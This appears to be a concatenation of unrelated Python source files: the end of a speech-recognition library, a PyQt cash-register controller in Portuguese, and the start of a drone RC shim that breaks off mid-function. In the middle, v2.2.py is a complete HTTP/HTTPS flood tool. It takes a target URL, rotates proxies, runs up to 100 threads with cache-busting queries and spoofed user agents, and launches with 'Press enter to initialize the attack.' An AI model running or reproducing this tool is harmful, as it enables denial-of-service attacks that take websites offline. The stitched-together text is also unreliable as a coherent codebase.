To get the API key for a Wit.ai app, go to the app's overview page, go to the section titled "Make an API request", and look for something along the lines of ``Authorization: Bearer XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX``; ``XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`` is the API key. Wit.ai API keys are 32-character uppercase alphanumeric strings.
The recognition language is configured in the Wit.ai app settings.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://wit.ai/docs/http/20141022#get-intent-via-text-link>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "``key`` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate=None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://api.wit.ai/speech?v=20160526"
request = Request(url, data=wav_data, headers={"Authorization": "Bearer {}".format(key), "Content-Type": "audio/wav"})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "_text" not in result or result["_text"] is None: raise UnknownValueError()
return result["_text"]
def recognize_bing(self, audio_data, key, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Microsoft Bing Voice Recognition API.
The Microsoft Bing Voice Recognition API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://www.microsoft.com/cognitive-services/en-us/speech-api>`__ with Microsoft Cognitive Services.
To get the API key, go to the `Microsoft Cognitive Services subscriptions overview <https://www.microsoft.com/cognitive-services/en-us/subscriptions>`__, go to the entry titled "Speech", and look for the key under the "Keys" column. Microsoft Bing Voice Recognition API keys are 32-character lowercase hexadecimal strings.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-4-supported-locales>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-3-voice-recognition-responses>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "``key`` must be a string"
assert isinstance(language, str), "``language`` must be a string"
access_token, expire_time = getattr(self, "bing_cached_access_token", None), getattr(self, "bing_cached_access_token_expiry", None)
allow_caching = True
try:
from time import monotonic # we need monotonic time to avoid being affected by system clock changes, but this is only available in Python 3.3+
except ImportError:
try:
from monotonic import monotonic # use time.monotonic backport for Python 2 if available (from https://pypi.python.org/pypi/monotonic)
except (ImportError, RuntimeError):
expire_time = None # monotonic time not available, don't cache access tokens
allow_caching = False # don't allow caching, since monotonic time isn't available
if expire_time is None or monotonic() > expire_time: # caching not enabled, first credential request, or the access token from the previous one expired
# get an access token using OAuth
credential_url = "https://api.cognitive.microsoft.com/sts/v1.0/issueToken"
credential_request = Request(credential_url, data=b"", headers={
"Content-type": "application/x-www-form-urlencoded",
"Content-Length": "0",
"Ocp-Apim-Subscription-Key": key,
})
if allow_caching:
start_time = monotonic()
try:
credential_response = urlopen(credential_request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
access_token = credential_response.read().decode("utf-8")
if allow_caching:
# save the token for the duration it is valid for
self.bing_cached_access_token = access_token
self.bing_cached_access_token_expiry = start_time + 600 # according to https://www.microsoft.com/cognitive-services/en-us/Speech-api/documentation/API-Reference-REST/BingVoiceRecognition, the token expires in exactly 10 minutes
wav_data = audio_data.get_wav_data(
convert_rate=16000, # audio samples must be 8kHz or 16 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://speech.platform.bing.com/recognize/query?{}".format(urlencode({
"version": "3.0",
"requestid": uuid.uuid4(),
"appID": "D4D52672-91D7-4C74-8AD8-42B1D98141A5",
"format": "json",
"locale": language,
"device.os": "wp7",
"scenarios": "ulm",
"instanceid": uuid.uuid4(),
"result.profanitymarkup": "0",
}))
request = Request(url, data=wav_data, headers={
"Authorization": "Bearer {}".format(access_token),
"Content-Type": "audio/wav; samplerate=16000; sourcerate={}; trustsourcerate=true".format(audio_data.sample_rate),
})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "header" not in result or "lexical" not in result["header"]: raise UnknownValueError()
return result["header"]["lexical"]
def recognize_houndify(self, audio_data, client_id, client_key, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Houndify API.
The Houndify client ID and client key are specified by ``client_id`` and ``client_key``, respectively. Unfortunately, these are not available without `signing up for an account <https://www.houndify.com/signup>`__. Once logged into the `dashboard <https://www.houndify.com/dashboard>`__, you will want to select "Register a new client", and fill in the form as necessary. When at the "Enable Domains" page, enable the "Speech To Text Only" domain, and then select "Save & Continue".
To get the client ID and client key for a Houndify client, go to the `dashboard <https://www.houndify.com/dashboard>`__ and select the client's "View Details" link. On the resulting page, the client ID and client key will be visible. Client IDs and client keys are both Base64-encoded strings.
Currently, only English is supported as a recognition language.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(client_id, str), "``client_id`` must be a string"
assert isinstance(client_key, str), "``client_key`` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate=None if audio_data.sample_rate in [8000, 16000] else 16000, # audio samples must be 8 kHz or 16 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://api.houndify.com/v1/audio"
user_id, request_id = str(uuid.uuid4()), str(uuid.uuid4())
request_time = str(int(time.time()))
request_signature = base64.urlsafe_b64encode(
hmac.new(
base64.urlsafe_b64decode(client_key),
user_id.encode("utf-8") + b";" + request_id.encode("utf-8") + request_time.encode("utf-8"),
hashlib.sha256
).digest() # get the HMAC digest as bytes
).decode("utf-8")
request = Request(url, data=wav_data, headers={
"Content-Type": "application/json",
"Hound-Request-Info": json.dumps({"ClientID": client_id, "UserID": user_id}),
"Hound-Request-Authentication": "{};{}".format(user_id, request_id),
"Hound-Client-Authentication": "{};{};{}".format(client_id, request_time, request_signature)
})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "Disambiguation" not in result or result["Disambiguation"] is None:
raise UnknownValueError()
return result['Disambiguation']['ChoiceData'][0]['Transcription']
def recognize_ibm(self, audio_data, username, password, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the IBM Speech to Text API.
The IBM Speech to Text username and password are specified by ``username`` and ``password``, respectively. Unfortunately, these are not available without `signing up for an account <https://console.ng.bluemix.net/registration/>`__. Once logged into the Bluemix console, follow the instructions for `creating an IBM Watson service instance <https://www.ibm.com/watson/developercloud/doc/getting_started/gs-credentials.shtml>`__, where the Watson service is "Speech To Text". IBM Speech to Text usernames are strings of the form XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX, while passwords are mixed-case alphanumeric strings.
The recognition language is determined by ``language``, an RFC5646 language tag with a dialect like ``"en-US"`` (US English) or ``"zh-CN"`` (Mandarin Chinese), defaulting to US English. The supported language values are listed under the ``model`` parameter of the `audio recognition API documentation <https://www.ibm.com/watson/developercloud/speech-to-text/api/v1/#sessionless_methods>`__, in the form ``LANGUAGE_BroadbandModel``, where ``LANGUAGE`` is the language value.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.ibm.com/watson/developercloud/speech-to-text/api/v1/#sessionless_methods>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(username, str), "``username`` must be a string"
assert isinstance(password, str), "``password`` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate=None if audio_data.sample_rate >= 16000 else 16000, # audio samples should be at least 16 kHz
convert_width=None if audio_data.sample_width >= 2 else 2 # audio samples should be at least 16-bit
)
url = "https://stream.watsonplatform.net/speech-to-text/api/v1/recognize?{}".format(urlencode({
"profanity_filter": "false",
"continuous": "true",
"model": "{}_BroadbandModel".format(language),
}))
request = Request(url, data=flac_data, headers={
"Content-Type": "audio/x-flac",
"X-Watson-Learning-Opt-Out": "true", # prevent requests from being logged, for improved privacy
})
authorization_value = base64.standard_b64encode("{}:{}".format(username, password).encode("utf-8")).decode("utf-8")
request.add_header("Authorization", "Basic {}".format(authorization_value))
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "results" not in result or len(result["results"]) < 1 or "alternatives" not in result["results"][0]:
raise UnknownValueError()
transcription = []
for utterance in result["results"]:
if "alternatives" not in utterance: raise UnknownValueError()
for hypothesis in utterance["alternatives"]:
if "transcript" in hypothesis:
transcription.append(hypothesis["transcript"])
return "\n".join(transcription)
def get_flac_converter():
"""Returns the absolute path of a FLAC converter executable, or raises an OSError if none can be found."""
flac_converter = shutil_which("flac") # check for installed version first
if flac_converter is None: # flac utility is not installed
compatible_machine_types = {"i686", "i786", "x86", "x86_64", "AMD64"} # whitelist of machine types our bundled binaries are compatible with
flac_converters = {"Windows": "flac-win32.exe", "Linux": "flac-linux-x86", "Darwin": "flac-mac"}
flac_converter = flac_converters.get(platform.system(), None)
if flac_converter is not None and platform.machine() in compatible_machine_types:
base_path = os.path.dirname(os.path.abspath(__file__)) # directory of the current module file, where all the FLAC bundled binaries are stored
flac_converter = os.path.join(base_path, flac_converter)
else:
raise OSError("FLAC conversion utility not available - consider installing the FLAC command line application by running `apt-get install flac` or your operating system's equivalent")
# mark FLAC converter as executable if possible
try:
stat_info = os.stat(flac_converter)
os.chmod(flac_converter, stat_info.st_mode | stat.S_IEXEC)
except OSError: pass
return flac_converter
def shutil_which(pgm):
"""Python 2 compatibility: backport of ``shutil.which()`` from Python 3"""
path = os.getenv('PATH')
for p in path.split(os.path.pathsep):
p = os.path.join(p, pgm)
if os.path.exists(p) and os.access(p, os.X_OK):
return p
class tempfile_TemporaryDirectory(object):
"""Python 2 compatibility: backport of ``tempfile.TemporaryDirectory`` from Python 3"""
def __enter__(self):
self.name = tempfile.mkdtemp()
return self.name
def __exit__(self, exc_type, exc_value, traceback):
shutil.rmtree(self.name)
# ===============================
# backwards compatibility shims
# ===============================
WavFile = AudioFile # WavFile was renamed to AudioFile in 3.4.1
def recognize_api(self, audio_data, client_access_token, language="en", session_id=None, show_all=False):
wav_data = audio_data.get_wav_data(convert_rate=16000, convert_width=2)
url = "https://api.api.ai/v1/query"
while True:
boundary = uuid.uuid4().hex
if boundary.encode("utf-8") not in wav_data: break
if session_id is None: session_id = uuid.uuid4().hex
data = b"--" + boundary.encode("utf-8") + b"\r\n" + b"Content-Disposition: form-data; name=\"request\"\r\n" + b"Content-Type: application/json\r\n" + b"\r\n" + b"{\"v\": \"20150910\", \"sessionId\": \"" + session_id.encode("utf-8") + b"\", \"lang\": \"" + language.encode("utf-8") + b"\"}\r\n" + b"--" + boundary.encode("utf-8") + b"\r\n" + b"Content-Disposition: form-data; name=\"voiceData\"; filename=\"audio.wav\"\r\n" + b"Content-Type: audio/wav\r\n" + b"\r\n" + wav_data + b"\r\n" + b"--" + boundary.encode("utf-8") + b"--\r\n"
request = Request(url, data=data, headers={"Authorization": "Bearer {}".format(client_access_token), "Content-Length": str(len(data)), "Expect": "100-continue", "Content-Type": "multipart/form-data; boundary={}".format(boundary)})
try: response = urlopen(request, timeout=10)
except HTTPError as e: raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e: raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
if show_all: return result
if "status" not in result or "errorType" not in result["status"] or result["status"]["errorType"] != "success":
raise UnknownValueError()
return result["result"]["resolvedQuery"]
Recognizer.recognize_api = classmethod(recognize_api) # API.AI Speech Recognition is deprecated/not recommended as of 3.5.0, and currently is only optionally available for paid plans
|
v2.2.py
|
#!/usr/bin/env python
#version: beta-2.2
import threading
import argparse
import logging
import random
import atexit
import socket
import socks
import time
import ssl
import sys
import os
parser = argparse.ArgumentParser()
parser.add_argument("url", nargs="?", type=str, help="Target URL. Format: \"http(s)://example.com/path/index.php?param1=param1_value¶m2=param2_value\"")
parser.add_argument("proxy_list", nargs="?", type=str, help="Proxy list file. Closes when file is invalid")
parser.add_argument("proxy_type", nargs="?", type=str, help="Proxy list type. Proxy Types: SOCKS5, SOCKS4, HTTP")
parser.add_argument("-p", "--port", type=int, default=80, help="URL host's port. Sets to 443 when using HTTPS protocol")
parser.add_argument("-m", "--method", type=str, default="GET", help="HTTP request method. Default: GET")
parser.add_argument("-t", "--threads", type=int, default=100, help="Max threads. Default: 100")
parser.add_argument("-d", "--debug", action="store_true", help="Enables debug mode")
parser.add_argument("--delay", type=int, default=5, help="Delay seconds to send HTTP requests. Default: 5")
parser.add_argument("--timeout", type=int, default=5, help="Set default socket connection timeout. Default: 5")
parser.add_argument("--rpp", type=int, default=777, help="Set requests per proxy. Default: 777")
parser.set_defaults(debug=False)
args = parser.parse_args()
use_proxy = True
if not args.url:
parser.print_help()
print("URL is required. Example: https://example.com/path/")
sys.exit()
if not args.proxy_list:
use_proxy = False
if not args.proxy_type and use_proxy:
parser.print_help()
print("Proxy type is required. Example: SOCKS5, SOCKS4, HTTP")
sys.exit()
if args.port < 1 or args.port > 65535:
print("Port number must be 1-65535")
sys.exit()
if args.threads < 1:
print("Invalid thread value. Minimum is 1")
sys.exit()
if args.debug:
debug = True
url = args.url
proxy_list = args.proxy_list
proxy_type = args.proxy_type
port = args.port
method = args.method
max_threads = args.threads
debug = args.debug
timeout = args.timeout
rpp = args.rpp
delay = args.delay
if debug:
logging.basicConfig(
format="[%(asctime)s] %(message)s",
datefmt="%H:%m:%S",
level=logging.DEBUG
)
else:
logging.basicConfig(
format="[%(asctime)s] %(message)s",
datefmt="%H:%m:%S",
level=logging.INFO
)
logger = logging.getLogger(__file__)
url = url.strip()
try:
protocol, url = url.split("://")
except ValueError:
print("Invalid URL format! Format: https://example.com/path/")
sys.exit()
except Exception as e:
print(f"Protocol/URL Split Error: {e}")
sys.exit()
try:
url, path = url.split("/", 1)
except ValueError:
path = ""
pass
except Exception as e:
print(f"URL/Path Split Error: {e}")
sys.exit()
try:
path, parameters = path.split("?")
except ValueError:
parameters = ""
pass
except Exception as e:
print(f"Path/Parameters Split Error: {e}")
sys.exit()
protocol_list = ["HTTP", "HTTPS"]
protocol = protocol.upper()
if not protocol in protocol_list:
print(f"Invalid protocol: {protocol}")
sys.exit()
if protocol == "HTTPS":
port = 443
path = f"/{path}"
if use_proxy:
proxy_type = proxy_type.upper()
parameters_str = parameters
if parameters != "":
parameters = f"&{parameters}"
if use_proxy:
try:
proxy_file = open(proxy_list, "r")
proxies = proxy_file.readlines()
proxy_file.close()
except FileNotFoundError:
print(f"Proxy list file not found!")
sys.exit()
except Exception as e:
print(f"Cannot open proxy list file: {e}")
sys.exit()
proxy_types = ["SOCKS4", "SOCKS5", "HTTP"]
try:
proxy_type_str = proxy_type
if not proxy_type in proxy_types:
raise AttributeError
proxy_type = getattr(socks, proxy_type)
except AttributeError:
print(f"{proxy_type} is not a valid proxy type! Proxy Types: SOCKS5, SOCKS4, HTTP")
sys.exit()
except Exception as e:
print(f"Proxy Type Error: {e}")
sys.exit()
if timeout != None:
try:
timeout = int(timeout)
except Exception as e:
print(f"Set Default Timeout Error: {e}")
sys.exit()
try:
url_ip = socket.gethostbyname(url)
except Exception as e:
print(f"Unable to resolve domain's IP")
url_ip = "Unable to resolve"
if url == url_ip:
url_ip = ""
else:
url_ip = f"Domain IP: {url_ip}\r\n"
if use_proxy:
proxies_length = len(proxies)
#You can uncomment this if you want.
#print(f"[---] Attack Information [---]\r\nProtocol: {protocol}\r\nURL: {url}\r\n{url_ip}Port: {port}\r\nPath: {path}\r\nParameters: {parameters_str}\r\nMethod: {method}\r\nProxy List: {proxy_list}\r\nProxy Type: {proxy_type_str}\r\nProxies: {proxies_length}\r\nTimeout: {timeout}\r\nMax Thread: {max_threads}\r\nDebug: {debug}\r\n")
try:
input("Press enter to initialize the attack.")
except KeyboardInterrupt:
sys.exit()
if sys.platform == "linux":
os.system("clear")
elif sys.platform == "win32":
os.system("cls")
logger.info("Initializing components...")
active_threads = 0
chars = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
chars_list = list(chars)
hrs = 0
Bps = 0
total_hrs = 0
total_Bps = 0
total_socks_used = 0
initial_attack_time = 0
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0",
"AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) ",
"msnbot-131-253-46-102.search.msn.com",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.7.0; U; Edition MacAppStore; en) ",
"Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/534.34 (KHTML,like Gecko) PhantomJS/1.9.0 (development) Safari/534.34",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2)"
]
logger.info("Done!")
def HTTPS(host, port, proxy_host=None, proxy_port=None):
try:
global active_threads
global hrs
global Bps
global total_hrs
global total_Bps
global total_socks_used
active_threads += 1
port = int(port)
proxy_port = int(port)
rp = int(rpp)
if use_proxy:
sock = socks.socksocket()
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((host, port))
total_socks_used += 1
context = ssl.create_default_context()
sock = context.wrap_socket(sock, server_hostname=host)
for _ in range(rp):
anti_cache_list = random.choices(chars_list, k=77)
anti_cache = "".join(anti_cache_list)
user_agent = random.choices(user_agents)
http = f"{method} {path}?{anti_cache}{parameters} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nConnection: close\r\n\r\n"
sent_bytes = sock.send(http.encode())
Bps += sent_bytes
hrs += 1
total_hrs += 1
total_Bps += sent_bytes
time.sleep(delay)
except Exception as e:
logger.debug(f"HTTPS Error: {e}")
pass
finally:
active_threads -= 1
def HTTP(host, port, proxy_host=None, proxy_port=None):
try:
global active_threads
global hrs
global Bps
global total_hrs
global total_Bps
global total_socks_used
active_threads += 1
port = int(port)
if use_proxy:
proxy_port = int(proxy_port)
rp = int(rpp)
if use_proxy:
sock = socks.socksocket()
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
total_socks_used += 1
for _ in range(rp):
anti_cache_list = random.choices(chars_list, k=77)
anti_cache = "".join(anti_cache_list)
user_agent = random.choices(user_agents)
http = f"{method} {path}?{anti_cache}{parameters} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nConnection: close\r\n\r\n"
sent_bytes = sock.send(http.encode())
Bps += sent_bytes
hrs += 1
total_hrs += 1
total_Bps += sent_bytes
time.sleep(delay)
except Exception as e:
logger.debug(f"HTTP Error: {e}")
pass
finally:
active_threads -= 1
def verbose_status():
try:
global hrs
global Bps
separator = " " * 6
while True:
time.sleep(1)
print(f"Threads: \u001b[32;1m{active_threads}\u001b[0;0m {separator[len(str(active_threads)):]} HR/s: \u001b[32;1m{hrs}\u001b[0;0m {separator[len(str(hrs)):]} kB/s: \u001b[32;1m{Bps / 1000:.2f}\u001b[0;0m")
hrs = 0
Bps = 0
except Exception as e:
print(f"Error initializing verbose status: {e}")
sys.exit()
def main():
try:
global initial_attack_time
initial_attack_time = time.time()
logger.info("Initializing attack...\r\n")
threading.Thread(target=verbose_status, daemon=True).start()
if use_proxy:
while True:
for proxy in proxies:
proxy = proxy.strip()
proxy_host, proxy_port = proxy.split(":")
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=eval(protocol), args=[url, port, proxy_host, proxy_port], daemon=True).start()
break
else:
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=eval(protocol), args=[url, port]).start()
except Exception as e:
print(f"Main Error: {e}")
sys.exit()
except KeyboardInterrupt:
sys.exit()
def onexit():
try:
print("\r\n")
logging.info("Attack finished\r\n")
print(f"Duration: \u001b[32;1m{(time.time() - initial_attack_time):.2f} seconds\u001b[0;0m\r\nTotal Sockets: \u001b[32;1m{total_socks_used}\u001b[0;0m\r\nTotal HTTP: \u001b[32;1m{total_hrs}\u001b[0;0m\r\nTotal Bandwidth: \u001b[32;1m{(total_Bps / 1000):.2f} kB\u001b[0;0m\r\n")
except Exception:
pass
atexit.register(onexit)
if __name__ == "__main__":
main()
|
controllerTelaSistema.py
|
from PyQt5.QtWidgets import QMainWindow
from view.telaSistema import Ui_MainWindow
from PyQt5.QtWidgets import QTableWidget,QTableWidgetItem
from model.entrada import Entrada
from model.saida import Saida
import threading, time
from datetime import datetime
class ControllerTelaSistema(QMainWindow):
def __init__(self, model):
super().__init__()
self.model = model
self.tela = Ui_MainWindow()
self.tela.setupUi(self)
#transições entre telas
self.tela.buttonEntradasESaidas.clicked.connect(self.mostrarframeEntradasESaidas)
self.tela.buttonEstatisticas.clicked.connect(self.mostrarFrameEstatisticas)
self.tela.buttonVendas.clicked.connect(self.mostrarFrameVendas)
#fim transições entre telas
#relogio
contar = threading.Thread(target = self.contarSegundos)
contar.daemon = True
contar.start()
#fim relogio
#gerenciamento de venda
self.totalVendaAtual = 0
##adicionar valor a tabela venda
self.tela.buttonConfirmarEntradaVenda.clicked.connect(self.adicionarValorATabelaVenda)
##fim adicionar valor a tabela venda
##adicionar valor recebido venda
self.tela.buttonAdicionarValorRecebidoVenda.clicked.connect(self.adicionarValorRecebidoVendaEGerarTroco)
##fim adicionar valor recebido venda
##finalizar venda e adicionar a base
self.tela.buttonFinalizarVenda.clicked.connect(self.finalizarVenda)
##fim finalizar venda e adicionar a base
#fim gerenciamento de venda
#listagem Entradas e saidas
#self.tela.buttonConfirmarEntrada.clicked.connect()
#fim listagem entradas e saidas
#adicionar entrada pela tela de listagem
self.tela.buttonConfirmarEntrada.clicked.connect(self.adicionarEntradaPelaListagem)
#fim adicionar entrada pela tela de listagem
#adicionar saida pela tela de listagem
self.tela.buttonConfirmarSaida.clicked.connect(self.adicionarSaidaPelaListagem)
#fim adicionar saida pela tela de listagem
#ajustar label de total geral
self.calcularTotalGeralDeSaldo()
#fim ajustar label total geral
#transições entre telas
def mostrarframeEntradasESaidas(self):
self.esconderTodosOsFramesDeUso()
self.tela.frameEntradasESaidas.show()
self.atualizarJanelas()
def atualizarJanelas(self):
self.listarEntradas()
self.listarSaidas()
self.calcularTotalGeralDeSaldo()
def mostrarFrameEstatisticas(self):
self.esconderTodosOsFramesDeUso()
self.tela.frameEstatisticas.show()
def mostrarFrameVendas(self):
self.esconderTodosOsFramesDeUso()
self.tela.frameVendas.show()
def esconderTodosOsFramesDeUso(self):
self.tela.frameEntradasESaidas.hide()
self.tela.frameEstatisticas.hide()
self.tela.frameVendas.hide()
self.tela.frameInicial.hide()
#fim transições entre telas
#relogio
def contarSegundos(self):
while True:
now = datetime.now()
self.tela.relogio.setText(now.strftime("%H:%M:%S"))
time.sleep(1)
#fim relogio
#adicionar valor a tabela venda
def adicionarValorATabelaVenda(self):
valor = self.tela.entradaValorVenda.toPlainText()
atual = self.tela.tabelaVendaItens.rowCount()
self.tela.tabelaVendaItens.insertRow(atual)
self.tela.tabelaVendaItens.setItem(atual , 0, QTableWidgetItem(valor))
self.totalVendaAtual += float(valor)
self.tela.labelTotalVenda.setText("Total: {}".format(self.totalVendaAtual))
#fim adicionar valor a tabela venda
#adicionar valor recebido venda e gerar troco
def adicionarValorRecebidoVendaEGerarTroco(self):
recebido = self.tela.entradaValorRecebidoVenda.toPlainText()
troco = float(recebido) - float(self.totalVendaAtual)
self.tela.labelTroco.setText("Troco: {}".format(troco))
#fim adicionar valor recebido venda
#finalizar venda
def finalizarVenda(self):
entrada = Entrada()
if self.totalVendaAtual != 0:
entrada.adicionarEntrada(self.totalVendaAtual, "venda")
limpar = threading.Thread(target = self.limparTelaVenda)
limpar.daemon = True
limpar.start()
self.atualizarJanelas()
def limparTelaVenda(self):
self.tela.entradaValorVenda.clear()
self.tela.labelTroco.setText("Troco:")
self.tela.tabelaVendaItens.setRowCount(0)
self.tela.labelTotalVenda.setText("Total:")
self.tela.entradaValorRecebidoVenda.clear()
self.totalVendaAtual = 0
#fim finalizar venda
#listar entradas e saidas na tela de listagem
def listarEntradas(self):
self.tela.tabelaEntradas.setRowCount(0)
entrada = Entrada()
entradas = entrada.listarEntradas()
for elemento in entradas:
atual = self.tela.tabelaEntradas.rowCount()
self.tela.tabelaEntradas.insertRow(atual)
self.tela.tabelaEntradas.setItem(atual , 0, QTableWidgetItem(str(elemento[0])))
self.tela.tabelaEntradas.setItem(atual , 1, QTableWidgetItem(str(elemento[1])))
self.tela.tabelaEntradas.setItem(atual , 2, QTableWidgetItem(str(elemento[2])))
self.tela.tabelaEntradas.setItem(atual , 3, QTableWidgetItem(str(elemento[3])))
#fim listar entradas e saidas na tela de listagem
#listar saidas na tela de listagem
def listarSaidas(self):
self.tela.tabelaSaidas.setRowCount(0)
saida = Saida()
saidas = saida.listarSaidas()
for elemento in saidas:
atual = self.tela.tabelaSaidas.rowCount()
self.tela.tabelaSaidas.insertRow(atual)
self.tela.tabelaSaidas.setItem(atual , 0, QTableWidgetItem(str(elemento[0])))
self.tela.tabelaSaidas.setItem(atual , 1, QTableWidgetItem(str(elemento[1])))
self.tela.tabelaSaidas.setItem(atual , 2, QTableWidgetItem(str(elemento[2])))
#fim listar saidas na tela de listagem
#adicionar valor entrada pela janela de listagem
def adicionarEntradaPelaListagem(self):
try:
valor = float(self.tela.entradaValorEntrada.toPlainText())
except:
print("ocorreu um erro")
else:
if(self.tela.radioButtonXbox.isChecked()):
tipo = "xbox"
else:
tipo = "pc"
if valor != 0:
entrada = Entrada()
entrada.adicionarEntrada(valor, tipo)
self.tela.entradaValorEntrada.clear()
self.atualizarJanelas()
#fim adicionar valor entrada pela janela de listagem
#adicionar valor saida pela tela de listagem
def adicionarSaidaPelaListagem(self):
try:
valor = float(self.tela.entradaValorSaida.toPlainText())
except:
print("ocorreu um erro")
else:
if valor != 0:
saida = Saida()
saida.adicionarSaida(valor)
self.tela.entradaValorSaida.clear()
self.atualizarJanelas()
#fim adicionar valor saida pela tela de listagem
#total geral de saldo
def calcularTotalGeralDeSaldo(self):
totalEntradas = 0
totalSaidas = 0
entradas = Entrada().listarEntradas()
for entrada in entradas:
totalEntradas += float(entrada[0])
saidas = Saida().listarSaidas()
for saida in saidas:
totalSaidas += float(saida[0])
totalGeral = totalEntradas - totalSaidas
self.tela.labelTotal.setText("Total: {0:.2f}".format(totalGeral))
#fim total geral de saldo
|
rc_ipc_shim.py
|
import socket
import time
import struct
from threading import Thread
from sololink import rc_pkt
rc_sock = None
rc_attached = False
rc_actual = [1500, 1500, 900, 1500, 0, 0, 0, 0]
rc_override = [1500, 1500, 900, 1500, 0, 0, 0, 0]
def attach():
global rc_attached
rc_attached = True
def detach():
global rc_attached
rc_attached = False
def put(arg):
global rc_override
(timestamp, sequence, chan) = arg
rc_override = [chan[2], chan[1], chan[0], chan[3], chan[4], chan[5], chan[6], chan[7]]
return True
def pixrc_start():
global rc_sock
global rc_actual
if not rc_sock:
rc_sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
rc_sock.setblocking(0)
